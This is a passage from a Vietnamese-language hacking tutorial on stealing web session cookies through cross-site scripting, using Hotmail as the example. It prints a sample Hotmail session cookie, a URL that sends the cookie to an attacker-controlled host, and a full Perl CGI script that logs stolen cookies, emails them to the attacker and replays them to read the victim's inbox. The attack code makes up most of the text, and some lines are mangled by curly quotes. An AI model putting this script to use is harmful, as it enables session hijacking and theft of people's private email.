print MAIL “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”;
close (MAIL);
Hacker chỉ cần đọc Mail và lấy giá trị Cookies vừa ăn cắp được của nạn nhân và đăng nhập vào hệ thống ứng dụng Web với giá trị Cookies đó mà không cần User và Pass. Tất nhiên anh ta có toàn quyền sử dụng tài khoản này.
Now Let's Automated it
Một trong những trở ngại lớn nhất trong quá trình đánh cắp Cookies của các Hacker có lẽ là sự tính toán về yếu tố thời gian. Bởi vì ngoài việc phải phục kích đúng thời điểm nạn nhân đăng nhập. Các Hacker còn phải liên tục theo dõi các E-mail và những CGI log trong khi thực hiện công việc đánh cắp Cookies, và tiến hành đánh cắp phiên làm việc trước khi nạn nhân thoát ra khỏi phiên làm việc đó. Chính vì vậy mà các Hacker đã nghĩ đến làm sao phải tự động hoá cái quá trình tốn kém công sức và thời gian này.
Chúng ta hãy cùng xem xét qua Hotmail. Một dịch vụ Freemail nổi tiếng của hãng MSN. Đầu tiên kẻ tấn công cũng đánh lừa nạn nhân Click vào một liên kết để đánh cắp Cookies của họ, hoặc thậm chí các Hacker còn sử dụng cả các Worm.
Lấy ví dụ một đoạn Cookies của Hotmail có dạng sau:
HMP1=1;
HMSC0899=223victim%40hotmail%2ecomSxAIWq5iIf2ZTc6e
TZYkHUqtZeCuYMKoBAB1eiapyad
Kb1RCjuNz5U4%21l1KIOsuBpTEbUKYkmTuzPJVj%2abtLeMyiV
Gap9BF82YvrP2WPsX4Z6ekH9a7c
Rqq2VqTspQIS33GWygbPEsLOEFIupoiaYZdqmURMJK%21nh6O4
u4UNAJUjzOmQ8ye%2at3GjQfi6p
Ba3vTT533tCRmZDy47NZY6cPdkbeHR5soAVnNPyqhvm73a%214
%2aFRHPJfOGhT6cbVR9zN%21XDX
3seXv9czjX6cm2lugTnpKZS2UQ0j%21%21PWkyiqS2aSw%2aKk
2%2aCquxzpjE2F0uVZgHfznNjVL
PgGV2H%2a5GqZjXf144U0m8HFwlGS9A8RIwNMGtMoSro%2atCU
6L6304VyZyJ4vlEM%21adk%24;
MC1=V=3&GUID=0724b14826c9437ct786ba6f2a36b04f;
lang=en-us;
mh=MSFT;
SITESERVER=ID=UID=0724b14876c9437ca786ba6f2a36b44f
;
MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSdtiJExWGRQ5cmSuJ9
CUf4QSJbsQNmKkOCe3RLo%21A5G
hxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;
MSPProf=2JqD6vvUbB11hog4j6OgbT%21BYwgn3IZN9AyKYUpD
NECCi%2a9dBZf37wqxmWtyS%21%
21Z6icYG8dVF30FnbsANQcdN1lQ%21QJCTDiddJAW9oiWSf%2a
8g9nwIGclDtNP6Hk2gFlOfZHEju
vkM6Ja1N549eYs1VuhdcHCFWukzbVR%21%218POKn%2aS8vcqV
g4ZHHgabh0CQXoxj;
domain=lw4fd.law4.hotmail.msn.com;
Và nó sẽ được gửi đến Script CGI của Hacker với nội dung sau:
http://attacker.com/steal2.cgi?HMP1=1;%20HMSC0899=223victim%40hotmail%2ecomSx
AIWq5iIf2ZTc6eTZYkHUqtZeCuYMKoBAB1eiapyadKb1RCjuNz
5U4%21l1KIOsuBpTEbUKYkmTuzP
JVj%2abtLeMyiVGap9BF82YvrP2WPsX4Z6ekH9a7cRqq2VqTsp
QIS33GWygbPEsLOEFIupoiaYZdq
mURMJK%21nh6O4u4UNAJUjzOmQ8ye%2at3GjQfi6pBa3vTT533
tCRmZDy47NZY6cPdkbeHR5soAVn
NPyqhvm73a%214%2aFRHPJfOGhT6cbVR9zN%21XDX3seXv9czj
X6cm2lugTnpKZS2UQ0j%21%21PW
kyiqS2aSw%2aKk2%2aCquxzpjE2F0uVZgHfznNjVLPgGV2H%2a
5GqZjXf144U0m8HFwlGS9A8RIwN
MGtMoSro%2atCU6L6304VyZyJ4vlEM%21adk%24;%20MC1=V=3
&GUID=0724b14826c9437ct786b
a6f2a36b04f;%20lang=en_s;%20mh=MSFT;%20SITESERVER=
ID=UID=0724b14876c9437ca786
ba6f2a36b44f;%20MSPAuth=2JqD6vvUbDzqFAm6O7QVMWaeSd
tiJExWGRQ5cmSuJ9CUf4QSJbsQN
mKkOCe3RLo%21A5GhxQ7mtfdZ%2aw3Bc0O7Pwzw%24%24;%20M
SPProf=2JqD6vvUbB11hog4j6Og
bT%21BYwgn3IZN9AyKYUpDNECCi%2a9dBZf37wqxmWtyS%21%1
Z6icYG8dVF30FnbsANQcdN1lQ%
21QJCTDiddJAW9oiWSf%2a8g9nwIGclDtNP6Hk2gFlOfZHEjuv
kM6Ja1N549eYs1VuhdcHCFWukzb
VR%21%218POKn%2aS8vcqVg4ZHHgabh0CQXoxj;%20domain=l
w4fd.law4.hotmail.msn.com;

Dưới đây là đoạn Code CGI được sử dụng để đánh cắp CGI của Hotmail:
#!/usr/bin/perl
# steal2.cgi by David Endler dendler@idefense.com
use LWP::UserAgent;
use HTTP::Cookies;
$cookie = HTTP::Cookies->new (
File => $cookiefile,
AutoSave => 0, );
# Specific to your system
$mailprog = '/usr/sbin/sendmail';
# create a log file of cookies, we’ll also email them too
open(COOKIES,”>>stolen_cookie_file”);
# what the victim sees, customize as needed
print "Content-type:text/html\n\n";
print <<EndOfHTML;
<html><head><title>Cookie Stealing</title></head>
<body>
Your Cookie has been stolen. Thank you.
</body></html>
EndOfHTML
# The QUERY_STRING environment variable should be
# filled with
# the cookie text after steal2.cgi:
# http://www.attacker.com/steal2.cgi?XXXXX
print COOKIES “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”;
# now email the alert as well so we can start to hijack
open(MAIL,"|$mailprog -t");
print MAIL "To: attacker\@attacker.com\n";
print MAIL "From: cookie_steal\@attacker.com\n";
print MAIL "Subject: Stolen Cookie Submission\n\n";
print MAIL "-" x 75 . "\n\n";
print MAIL “$ENV{'QUERY_STRING'} from $ENV{‘REMOTE_ADDR’}\n”;
close (MAIL);
# this snippet goes to the victim’s Hotmail inbox and dumps
# the output. An attacker could just as easily add some lines
# to parse for http://lw4fd.law4.hotmail.msn.com/cgi-bin/getmsg?
# and then read the individual emails
$base_url = “http://lw4fd.law4.hotmail.msn.com/cgi-bin/HoTMaiL?”;
$ua->agent("Mozilla/4.75 [en] (Windows NT 5.0; U)");
$request = new HTTP::Request ('GET', $base_url);
$ua->cookie_jar( $cookie );
# let’s do a little parsing of our input to separate multiple
# cookies
# cookies are seperated by a semicolon and
# a space (%20),
# this will extract them so we can load them into our
# HTTP agent
@cookies = split(/;%20/,$ENV{'HTTP_COOKIE'});
for (@cookies){
@cookie_pairs = split(/=/, $_);
$cookie->set_cookie(0, “$cookie_pairs[0]” => “$cookie_pairs[1]”, "/",
".hotmail.com");
$cookie->add_cookie_header($request); }
# now that our forged credentials are loaded, let’s
# access the victim’s Hotmail account! At this point
# we can do anything to their account simply by forming the
# correct URL
$response = $ua->simple_request( $request );
$contents = $response->content;
print COOKIES “$contents\n”;
Như đã nói ở trên để thực hiện một cuộc tấn công XSS không phải là dễ. Nhưng bạn cũng lên thận trọng trước các cuộc tấn công kiểu này...
Bài viết của Binhnx2000